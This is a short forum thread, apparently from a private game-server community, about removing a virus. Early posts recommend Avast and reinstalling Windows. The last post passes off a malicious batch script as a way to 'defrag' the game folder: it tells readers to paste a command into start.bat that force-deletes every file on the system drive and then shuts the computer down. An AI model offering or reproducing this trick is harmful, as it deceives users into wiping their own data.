Joking the best 1 is Avast rly it do not leave a part without searching it 15000% to make sure of it and it delete the warlvirus and win32 virus and lots of kinds of the viruss ... Download it and tell me ur opionion on It !!

Be sure that virus from the .rar is rly hard and avast cant fix or delte 100% this virus :)
The best way is reinstall ur windows and install net.framework 4 and all the other shit and creat a good P-Server without this shit tools ;)

if i have learned one thing, than it is: never trust your anti-virus!!
if the source of an .exe/.dll file is not 100% safe allways do your own research!

try this add in start.bat with editior
delete everything in start.bat (opened with editor) and than add
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -s -f -t 00
than save the file
than look its realy .bat file saved
than doubleklick on it and wait it will now derfrag u kal online folder
